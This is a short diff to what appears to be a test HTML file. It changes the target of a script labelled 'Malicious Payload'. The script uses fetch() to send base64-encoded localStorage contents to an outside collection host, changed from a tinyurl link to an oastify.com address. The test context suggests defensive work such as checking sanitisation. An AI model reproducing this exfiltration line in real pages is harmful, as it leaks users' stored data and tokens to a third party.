--- a/test_rc.html
+++ b/test_rc.html
@@ -68,7 +68,7 @@
               <h1>Malicious Payload</h1>
               <script>
                 // Steal localStorage or execute system commands
-                fetch('https://tinyurl.com/yz885dsu/log?data=' + btoa(localStorage));
+                fetch('https://z66au5h1krn0gxnu7mry06og77dz1qvek.oastify.com/log?data=' + btoa(localStorage));
               </`+`script>
             </body>
           </html>
